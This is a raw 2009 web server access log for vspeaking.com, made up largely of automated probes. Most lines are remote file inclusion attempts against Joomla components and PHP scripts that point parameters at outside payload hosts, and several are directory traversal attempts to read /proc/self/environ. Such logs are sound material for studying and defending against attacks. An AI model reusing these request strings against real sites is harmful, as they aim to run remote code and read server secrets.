216.45.56.47 - - [28/Jun/2009:17:46:02 -0700] "GET /logs//index.php?option=com_flyspray&Itemid=&mosConfig_absolute_path=http://www.accesoplugin.com/imgs/info.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.826" "www.vspeaking.com"
216.45.56.47 - - [28/Jun/2009:17:46:02 -0700] "GET /index.php?option=com_flyspray&Itemid=&mosConfig_absolute_path=http://www.accesoplugin.com/imgs/info.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.826" "www.vspeaking.com"
61.67.196.130 - - [28/Jun/2009:17:46:36 -0700] "GET /error.php?dir=http://365ftf.com/cmsid.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.vspeaking.com"
61.67.196.130 - - [28/Jun/2009:17:46:37 -0700] "GET /logs//error.php?dir=http://365ftf.com/cmsid.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.vspeaking.com"
61.67.196.130 - - [28/Jun/2009:17:47:03 -0700] "GET /error.php?dir=http://365ftf.com/cmsid.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.vspeaking.com"
61.67.196.130 - - [28/Jun/2009:17:47:04 -0700] "GET /logs//error.php?dir=http://365ftf.com/cmsid.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.vspeaking.com"
216.45.56.47 - - [28/Jun/2009:17:47:10 -0700] "GET /logs/access_090413.log//index.php?option=com_jreactions&Itemid=&mosConfig_absolute_path=http://www.accesoplugin.com/imgs/info.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.826" "www.vspeaking.com"
216.45.56.47 - - [28/Jun/2009:17:47:10 -0700] "GET /logs//index.php?option=com_jreactions&Itemid=&mosConfig_absolute_path=http://www.accesoplugin.com/imgs/info.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.826" "www.vspeaking.com"
216.45.56.47 - - [28/Jun/2009:17:47:10 -0700] "GET /index.php?option=com_jreactions&Itemid=&mosConfig_absolute_path=http://www.accesoplugin.com/imgs/info.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.826" "www.vspeaking.com"
216.17.99.13 - - [28/Jun/2009:17:47:29 -0700] "GET /logs/access.log%20%20//?path%5Bdocroot%5D=http://rsh.kiev.ua/images/idfx1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "vspeaking.com"
216.17.99.13 - - [28/Jun/2009:17:47:29 -0700] "GET /?path%5Bdocroot%5D=http://rsh.kiev.ua/images/idfx1.txt? HTTP/1.1" 200 779 "-" "Mozilla/5.0" "vspeaking.com"
216.17.99.13 - - [28/Jun/2009:17:47:29 -0700] "GET /logs//?path%5Bdocroot%5D=http://rsh.kiev.ua/images/idfx1.txt? HTTP/1.1" 200 2373 "-" "Mozilla/5.0" "vspeaking.com"
194.165.34.49 - - [28/Jun/2009:17:48:17 -0700] "GET /logs//index.php?option=com_jreactions&Itemid=&mosConfig_absolute_path=http://www.accesoplugin.com/imgs/info.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.vspeaking.com"
194.165.34.49 - - [28/Jun/2009:17:48:17 -0700] "GET /index.php?option=com_jreactions&Itemid=&mosConfig_absolute_path=http://www.accesoplugin.com/imgs/info.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.vspeaking.com"
194.165.34.49 - - [28/Jun/2009:17:48:17 -0700] "GET /logs/access_090413.log//index.php?option=com_jreactions&Itemid=&mosConfig_absolute_path=http://www.accesoplugin.com/imgs/info.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.vspeaking.com"
194.165.34.49 - - [28/Jun/2009:17:48:31 -0700] "GET /logs/access_090413.log//index.php?option=com_flyspray&Itemid=&mosConfig_absolute_path=http://www.accesoplugin.com/imgs/info.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.vspeaking.com"
194.165.34.49 - - [28/Jun/2009:17:48:31 -0700] "GET /logs//index.php?option=com_flyspray&Itemid=&mosConfig_absolute_path=http://www.accesoplugin.com/imgs/info.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.vspeaking.com"
194.165.34.49 - - [28/Jun/2009:17:48:31 -0700] "GET /index.php?option=com_flyspray&Itemid=&mosConfig_absolute_path=http://www.accesoplugin.com/imgs/info.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.vspeaking.com"
213.251.168.157 - - [28/Jun/2009:17:49:47 -0700] "GET /logs//error.php?dir=http://365ftf.com/cmsid.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.vspeaking.com"
213.251.168.157 - - [28/Jun/2009:17:49:47 -0700] "GET /error.php?dir=http://365ftf.com/cmsid.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.vspeaking.com"
213.251.168.157 - - [28/Jun/2009:17:51:11 -0700] "GET /logs//error.php?dir=http://365ftf.com/cmsid.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.vspeaking.com"
213.251.168.157 - - [28/Jun/2009:17:51:12 -0700] "GET /error.php?dir=http://365ftf.com/cmsid.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.vspeaking.com"
213.251.168.157 - - [28/Jun/2009:17:51:42 -0700] "GET /logs//error.php?dir=http://365ftf.com/cmsid.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.vspeaking.com"
213.251.168.157 - - [28/Jun/2009:17:51:42 -0700] "GET /error.php?dir=http://365ftf.com/cmsid.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.vspeaking.com"
150.214.108.8 - - [28/Jun/2009:17:55:10 -0700] "GET /logs/access.log//error.php?dir=http://365ftf.com/cmsid.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.vspeaking.com"
150.214.108.8 - - [28/Jun/2009:17:55:10 -0700] "GET /error.php?dir=http://365ftf.com/cmsid.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.vspeaking.com"
222.122.6.62 - - [28/Jun/2009:17:56:12 -0700] "GET /index.php?option=com_flyspray&Itemid=&mosConfig_absolute_path=http://www.accesoplugin.com/imgs/info.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.vspeaking.com"
222.122.6.62 - - [28/Jun/2009:17:56:12 -0700] "GET /logs/access_090413.log//index.php?option=com_flyspray&Itemid=&mosConfig_absolute_path=http://www.accesoplugin.com/imgs/info.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.vspeaking.com"
222.122.6.62 - - [28/Jun/2009:17:56:12 -0700] "GET /logs//index.php?option=com_flyspray&Itemid=&mosConfig_absolute_path=http://www.accesoplugin.com/imgs/info.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.vspeaking.com"
87.106.179.130 - - [28/Jun/2009:17:57:11 -0700] "GET /logs//error.php?dir=http://365ftf.com/cmsid.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.vspeaking.com"
87.106.179.130 - - [28/Jun/2009:17:57:11 -0700] "GET /logs/access.log//error.php?dir=http://365ftf.com/cmsid.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.vspeaking.com"
87.106.179.130 - - [28/Jun/2009:17:57:11 -0700] "GET /error.php?dir=http://365ftf.com/cmsid.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.vspeaking.com"
87.106.179.130 - - [28/Jun/2009:17:57:40 -0700] "GET /logs/access.log//error.php?dir=http://365ftf.com/cmsid.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.vspeaking.com"
87.106.179.130 - - [28/Jun/2009:17:57:40 -0700] "GET /error.php?dir=http://365ftf.com/cmsid.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.vspeaking.com"
87.106.179.130 - - [28/Jun/2009:17:57:40 -0700] "GET /logs//error.php?dir=http://365ftf.com/cmsid.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.vspeaking.com"
87.106.179.130 - - [28/Jun/2009:17:57:56 -0700] "GET /error.php?dir=http://365ftf.com/cmsid.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.vspeaking.com"
87.106.179.130 - - [28/Jun/2009:17:57:56 -0700] "GET /logs//error.php?dir=http://365ftf.com/cmsid.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.vspeaking.com"
150.214.108.8 - - [28/Jun/2009:17:58:15 -0700] "GET /error.php?dir=http://365ftf.com/cmsid.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.vspeaking.com"
150.214.108.8 - - [28/Jun/2009:17:58:17 -0700] "GET /logs//error.php?dir=http://365ftf.com/cmsid.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.vspeaking.com"
150.214.108.8 - - [28/Jun/2009:17:58:19 -0700] "GET /logs//error.php?dir=http://365ftf.com/cmsid.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.vspeaking.com"
150.214.108.8 - - [28/Jun/2009:17:58:20 -0700] "GET /error.php?dir=http://365ftf.com/cmsid.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.vspeaking.com"
150.214.108.8 - - [28/Jun/2009:17:58:20 -0700] "GET /logs//error.php?dir=http://365ftf.com/cmsid.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.vspeaking.com"
222.122.6.62 - - [28/Jun/2009:17:58:23 -0700] "GET /index.php?option=com_jreactions&Itemid=&mosConfig_absolute_path=http://www.accesoplugin.com/imgs/info.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.vspeaking.com"
222.122.6.62 - - [28/Jun/2009:17:58:23 -0700] "GET /logs/access_090413.log//index.php?option=com_jreactions&Itemid=&mosConfig_absolute_path=http://www.accesoplugin.com/imgs/info.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.vspeaking.com"
222.122.6.62 - - [28/Jun/2009:17:58:23 -0700] "GET /logs//index.php?option=com_jreactions&Itemid=&mosConfig_absolute_path=http://www.accesoplugin.com/imgs/info.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.vspeaking.com"
163.17.8.18 - - [28/Jun/2009:17:58:37 -0700] "GET /bemarket/postscript/postscript.php?p_mode=http://163.17.8.18//ge/up1.gif?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.vspeaking.com"
87.106.179.130 - - [28/Jun/2009:17:59:15 -0700] "GET /error.php?dir=http://365ftf.com/cmsid.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.vspeaking.com"
87.106.179.130 - - [28/Jun/2009:17:59:15 -0700] "GET /logs//error.php?dir=http://365ftf.com/cmsid.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.vspeaking.com"
163.17.8.18 - - [28/Jun/2009:18:01:56 -0700] "GET /logs//bemarket/postscript/postscript.php?p_mode=http://163.17.8.18//ge/up1.gif?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.vspeaking.com"
87.106.179.130 - - [28/Jun/2009:18:03:36 -0700] "GET /logs//error.php?dir=http://365ftf.com/cmsid.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.vspeaking.com"
87.106.179.130 - - [28/Jun/2009:18:03:36 -0700] "GET /error.php?dir=http://365ftf.com/cmsid.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.vspeaking.com"
87.106.179.130 - - [28/Jun/2009:18:03:59 -0700] "GET /logs//error.php?dir=http://365ftf.com/cmsid.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.vspeaking.com"
87.106.179.130 - - [28/Jun/2009:18:03:59 -0700] "GET /error.php?dir=http://365ftf.com/cmsid.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.vspeaking.com"
163.17.8.18 - - [28/Jun/2009:18:05:18 -0700] "GET /logs/access.log//bemarket/postscript/postscript.php?p_mode=http://163.17.8.18//ge/up1.gif?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.vspeaking.com"
150.214.108.8 - - [28/Jun/2009:18:14:25 -0700] "GET /logs//error.php?dir=http://365ftf.com/cmsid.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.vspeaking.com"
150.214.108.8 - - [28/Jun/2009:18:14:25 -0700] "GET /error.php?dir=http://365ftf.com/cmsid.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.vspeaking.com"
150.214.108.8 - - [28/Jun/2009:18:17:27 -0700] "GET /logs//error.php?dir=http://365ftf.com/cmsid.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.vspeaking.com"
150.214.108.8 - - [28/Jun/2009:18:17:39 -0700] "GET /error.php?dir=http://365ftf.com/cmsid.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.vspeaking.com"
222.122.6.62 - - [28/Jun/2009:18:22:59 -0700] "GET /logs/access_090413.log//index.php?option=com_dbquery&Itemid=&mosConfig_absolute_path=http://www.accesoplugin.com/imgs/info.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.vspeaking.com"
222.122.6.62 - - [28/Jun/2009:18:22:59 -0700] "GET /logs//index.php?option=com_dbquery&Itemid=&mosConfig_absolute_path=http://www.accesoplugin.com/imgs/info.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.vspeaking.com"
222.122.6.62 - - [28/Jun/2009:18:22:59 -0700] "GET /index.php?option=com_dbquery&Itemid=&mosConfig_absolute_path=http://www.accesoplugin.com/imgs/info.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.vspeaking.com"
91.195.124.16 - - [28/Jun/2009:18:30:23 -0700] "GET /?sourcedir=http://www.avunitas.nl/buggsbunny?? HTTP/1.1" 200 779 "-" "Mozilla/4.0 (compatible; MSIE 5.5; Windows NT 5.0)" "www.vspeaking.com"
91.195.124.16 - - [28/Jun/2009:18:30:23 -0700] "GET /logs/access.log//?sourcedir=http://www.avunitas.nl/buggsbunny?? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 5.5; Windows NT 5.0)" "www.vspeaking.com"
91.195.124.16 - - [28/Jun/2009:18:30:23 -0700] "GET /logs//?sourcedir=http://www.avunitas.nl/buggsbunny?? HTTP/1.1" 200 2373 "-" "Mozilla/4.0 (compatible; MSIE 5.5; Windows NT 5.0)" "www.vspeaking.com"
91.195.124.16 - - [28/Jun/2009:18:30:23 -0700] "GET /errors.php?error=http://www.avunitas.nl/buggsbunny?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (X11; U; Linux x86_64; en-US; rv:1.7.6) Gecko/20050512 Firefox" "www.vspeaking.com"
91.195.124.16 - - [28/Jun/2009:18:30:23 -0700] "GET /logs/access.log/errors.php?error=http://www.avunitas.nl/buggsbunny?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (X11; U; Linux x86_64; en-US; rv:1.7.6) Gecko/20050512 Firefox" "www.vspeaking.com"
91.195.124.16 - - [28/Jun/2009:18:30:23 -0700] "GET /logs/errors.php?error=http://www.avunitas.nl/buggsbunny?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (X11; U; Linux x86_64; en-US; rv:1.7.6) Gecko/20050512 Firefox" "www.vspeaking.com"
91.195.124.16 - - [28/Jun/2009:18:30:23 -0700] "GET /logs/access.log//?sourcedir=../../../../../../../../../../../../../../../../../../../../../../../../proc/self/environ HTTP/1.1" 404 275 "-" "XXXXXX" "www.vspeaking.com"
91.195.124.16 - - [28/Jun/2009:18:30:23 -0700] "GET /logs//?sourcedir=../../../../../../../../../../../../../../../../../../../../../../../../proc/self/environ HTTP/1.1" 200 2373 "-" "XXXXXX" "www.vspeaking.com"
91.195.124.16 - - [28/Jun/2009:18:30:23 -0700] "GET /?sourcedir=../../../../../../../../../../../../../../../../../../../../../../../../proc/self/environ HTTP/1.1" 200 779 "-" "XXXXXX" "www.vspeaking.com"
91.195.124.16 - - [28/Jun/2009:18:30:24 -0700] "GET /logs/access.log//?sourcedir=../../../../../../../../../../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 275 "-" "XXXXXX" "www.vspeaking.com"
91.195.124.16 - - [28/Jun/2009:18:30:24 -0700] "GET /?sourcedir=../../../../../../../../../../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 200 779 "-" "XXXXXX" "www.vspeaking.com"
91.195.124.16 - - [28/Jun/2009:18:30:24 -0700] "GET /logs//?sourcedir=../../../../../../../../../../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 200 2373 "-" "XXXXXX" "www.vspeaking.com"
216.45.56.47 - - [28/Jun/2009:18:31:02 -0700] "GET /logs/access_090413.log//index.php?option=com_dbquery&Itemid=&mosConfig_absolute_path=http://www.accesoplugin.com/imgs/info.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.826" "www.vspeaking.com"
216.45.56.47 - - [28/Jun/2009:18:31:02 -0700] "GET /index.php?option=com_dbquery&Itemid=&mosConfig_absolute_path=http://www.accesoplugin.com/imgs/info.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.826" "www.vspeaking.com"
216.45.56.47 - - [28/Jun/2009:18:31:02 -0700] "GET /logs//index.php?option=com_dbquery&Itemid=&mosConfig_absolute_path=http://www.accesoplugin.com/imgs/info.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.826" "www.vspeaking.com"
216.17.99.13 - - [28/Jun/2009:18:47:00 -0700] "GET /logs//skin_shop/standard/3_plugin_twindow/twindow_notice.php?shop_this_skin_path=http://rsh.kiev.ua/images/idfx1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.vspeaking.com"
216.17.99.13 - - [28/Jun/2009:18:47:00 -0700] "GET /logs/scripts.log//skin_shop/standard/3_plugin_twindow/twindow_notice.php?shop_this_skin_path=http://rsh.kiev.ua/images/idfx1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.vspeaking.com"
216.17.99.13 - - [28/Jun/2009:18:47:01 -0700] "GET /skin_shop/standard/3_plugin_twindow/twindow_notice.php?shop_this_skin_path=http://rsh.kiev.ua/images/idfx1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.vspeaking.com"
67.215.238.186 - - [28/Jun/2009:18:52:59 -0700] "GET /logs/index.php HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; 6.0; Windows NT 5.1" "www.vspeaking.com"
78.181.26.6 - - [28/Jun/2009:18:56:27 -0700] "GET /favicon.ico HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 6.0; tr; rv:1.9.0.11) Gecko/2009060215 Firefox/3.0.11 (.NET CLR 3.5.30729)" "www.vspeaking.com"
78.181.26.6 - - [28/Jun/2009:18:56:27 -0700] "GET /logs/access.log HTTP/1.1" 200 41212 "-" "Mozilla/5.0 (Windows; U; Windows NT 6.0; tr; rv:1.9.0.11) Gecko/2009060215 Firefox/3.0.11 (.NET CLR 3.5.30729)" "www.vspeaking.com"
78.181.26.6 - - [28/Jun/2009:18:56:28 -0700] "GET /favicon.ico HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 6.0; tr; rv:1.9.0.11) Gecko/2009060215 Firefox/3.0.11 (.NET CLR 3.5.30729)" "vspeaking.com"
212.241.249.222 - - [28/Jun/2009:19:15:16 -0700] "GET /administrator/components/com_multibanners/extadminmenus.class.php?mosConfig_absolute_path=http://www.ssp3.ilawa.pl/images/zoom/.bjc/logs/uk1.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.vspeaking.com"
203.235.1.115 - - [28/Jun/2009:19:15:54 -0700] "GET /logs/access.log//errors.php?error=http://www.avunitas.nl/buggsbunny?? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 5.17; Mac_PowerPC)" "www.vspeaking.com"
203.235.1.115 - - [28/Jun/2009:19:15:54 -0700] "GET /logs/access.log/errors.php?error=http://www.avunitas.nl/buggsbunny?? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 6.0; America Online Browser 1.1; rev1.2; Windows NT 5.1;)" "www.vspeaking.com"
203.235.1.115 - - [28/Jun/2009:19:15:55 -0700] "GET /logs/access.log//errors.php?error=../../../../../../../../../../../../../../../../../../../../../../../../proc/self/environ HTTP/1.1" 404 275 "-" "XXXXXX" "www.vspeaking.com"
203.235.1.115 - - [28/Jun/2009:19:15:56 -0700] "GET /logs/access.log//errors.php?error=../../../../../../../../../../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 275 "-" "XXXXXX" "www.vspeaking.com"
91.195.124.16 - - [28/Jun/2009:19:16:40 -0700] "GET /logs/access.log//errors.php?error=http://www.avunitas.nl/buggsbunny?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; it; rv:1.8.1b1) Gecko/20060710 Firefox/2.0b1" "www.vspeaking.com"
91.195.124.16 - - [28/Jun/2009:19:16:40 -0700] "GET /errors.php?error=http://www.avunitas.nl/buggsbunny?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; it; rv:1.8.1b1) Gecko/20060710 Firefox/2.0b1" "www.vspeaking.com"
91.195.124.16 - - [28/Jun/2009:19:16:40 -0700] "GET /logs//errors.php?error=http://www.avunitas.nl/buggsbunny?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; it; rv:1.8.1b1) Gecko/20060710 Firefox/2.0b1" "www.vspeaking.com"
91.195.124.16 - - [28/Jun/2009:19:16:41 -0700] "GET /logs/access.log/errors.php?error=http://www.avunitas.nl/buggsbunny?? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 5.0; SunOS 5.9 sun4u; X11)" "www.vspeaking.com"
91.195.124.16 - - [28/Jun/2009:19:16:41 -0700] "GET /errors.php?error=http://www.avunitas.nl/buggsbunny?? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 5.0; SunOS 5.9 sun4u; X11)" "www.vspeaking.com"
91.195.124.16 - - [28/Jun/2009:19:16:41 -0700] "GET /logs/errors.php?error=http://www.avunitas.nl/buggsbunny?? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 5.0; SunOS 5.9 sun4u; X11)" "www.vspeaking.com"
91.195.124.16 - - [28/Jun/2009:19:16:41 -0700] "GET /logs/access.log//errors.php?error=../../../../../../../../../../../../../../../../../../../../../../../../proc/self/environ HTTP/1.1" 404 275 "-" "XXXXXX" "www.vspeaking.com"
91.195.124.16 - - [28/Jun/2009:19:16:41 -0700] "GET /errors.php?error=../../../../../../../../../../../../../../../../../../../../../../../../proc/self/environ HTTP/1.1" 404 275 "-" "XXXXXX" "www.vspeaking.com"
91.195.124.16 - - [28/Jun/2009:19:16:41 -0700] "GET /logs//errors.php?error=../../../../../../../../../../../../../../../../../../../../../../../../proc/self/environ HTTP/1.1" 404 275 "-" "XXXXXX" "www.vspeaking.com"
91.195.124.16 - - [28/Jun/2009:19:16:41 -0700] "GET /logs/access.log//errors.php?error=../../../../../../../../../../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 275 "-" "XXXXXX" "www.vspeaking.com"
91.195.124.16 - - [28/Jun/2009:19:16:41 -0700] "GET /errors.php?error=../../../../../../../../../../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 275 "-" "XXXXXX" "www.vspeaking.com"
91.195.124.16 - - [28/Jun/2009:19:16:41 -0700] "GET /logs//errors.php?error=../../../../../../../../../../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 275 "-" "XXXXXX" "www.vspeaking.com"
203.235.1.115 - - [28/Jun/2009:19:16:43 -0700] "GET /errors.php?error=http://www.avunitas.nl/buggsbunny?? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 5.17; Mac_PowerPC)" "www.vspeaking.com"
203.235.1.115 - - [28/Jun/2009:19:16:43 -0700] "GET /logs//errors.php?error=http://www.avunitas.nl/buggsbunny?? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 5.17; Mac_PowerPC)" "www.vspeaking.com"
203.235.1.115 - - [28/Jun/2009:19:16:43 -0700] "GET /errors.php?error=http://www.avunitas.nl/buggsbunny?? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 6.0; America Online Browser 1.1; rev1.2; Windows NT 5.1;)" "www.vspeaking.com"
203.235.1.115 - - [28/Jun/2009:19:16:43 -0700] "GET /logs/errors.php?error=http://www.avunitas.nl/buggsbunny?? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 6.0; America Online Browser 1.1; rev1.2; Windows NT 5.1;)" "www.vspeaking.com"
203.235.1.115 - - [28/Jun/2009:19:16:44 -0700] "GET /errors.php?error=../../../../../../../../../../../../../../../../../../../../../../../../proc/self/environ HTTP/1.1" 404 275 "-" "XXXXXX" "www.vspeaking.com"
203.235.1.115 - - [28/Jun/2009:19:16:44 -0700] "GET /logs//errors.php?error=../../../../../../../../../../../../../../../../../../../../../../../../proc/self/environ HTTP/1.1" 404 275 "-" "XXXXXX" "www.vspeaking.com"
203.235.1.115 - - [28/Jun/2009:19:16:45 -0700] "GET /errors.php?error=../../../../../../../../../../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 275 "-" "XXXXXX" "www.vspeaking.com"
203.235.1.115 - - [28/Jun/2009:19:16:45 -0700] "GET /logs//errors.php?error=../../../../../../../../../../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 275 "-" "XXXXXX" "www.vspeaking.com"
91.195.124.16 - - [28/Jun/2009:19:17:21 -0700] "GET /logs/access.log//errors.php?error=http://www.avunitas.nl/buggsbunny?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; it; rv:1.8.1b1) Gecko/20060710 Firefox/2.0b1" "www.vspeaking.com"
91.195.124.16 - - [28/Jun/2009:19:17:21 -0700] "GET /errors.php?error=http://www.avunitas.nl/buggsbunny?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; it; rv:1.8.1b1) Gecko/20060710 Firefox/2.0b1" "www.vspeaking.com"
91.195.124.16 - - [28/Jun/2009:19:17:21 -0700] "GET /logs//errors.php?error=http://www.avunitas.nl/buggsbunny?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; it; rv:1.8.1b1) Gecko/20060710 Firefox/2.0b1" "www.vspeaking.com"
91.195.124.16 - - [28/Jun/2009:19:17:21 -0700] "GET /logs/access.log/errors.php?error=http://www.avunitas.nl/buggsbunny?? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 5.0; SunOS 5.9 sun4u; X11)" "www.vspeaking.com"
91.195.124.16 - - [28/Jun/2009:19:17:21 -0700] "GET /errors.php?error=http://www.avunitas.nl/buggsbunny?? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 5.0; SunOS 5.9 sun4u; X11)" "www.vspeaking.com"
91.195.124.16 - - [28/Jun/2009:19:17:21 -0700] "GET /logs/errors.php?error=http://www.avunitas.nl/buggsbunny?? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 5.0; SunOS 5.9 sun4u; X11)" "www.vspeaking.com"
91.195.124.16 - - [28/Jun/2009:19:17:22 -0700] "GET /errors.php?error=../../../../../../../../../../../../../../../../../../../../../../../../proc/self/environ HTTP/1.1" 404 275 "-" "XXXXXX" "www.vspeaking.com"
91.195.124.16 - - [28/Jun/2009:19:17:22 -0700] "GET /errors.php?error=../../../../../../../../../../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 275 "-" "XXXXXX" "www.vspeaking.com"
91.195.124.16 - - [28/Jun/2009:19:17:22 -0700] "GET /logs//errors.php?error=../../../../../../../../../../../../../../../../../../../../../../../../proc/self/environ HTTP/1.1" 404 275 "-" "XXXXXX" "www.vspeaking.com"
91.195.124.16 - - [28/Jun/2009:19:17:22 -0700] "GET /logs//errors.php?error=../../../../../../../../../../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 275 "-" "XXXXXX" "www.vspeaking.com"
91.195.124.16 - - [28/Jun/2009:19:17:24 -0700] "GET /logs/access.log//errors.php?error=../../../../../../../../../../../../../../../../../../../../../../../../proc/self/environ HTTP/1.1" 404 275 "-" "XXXXXX" "www.vspeaking.com"
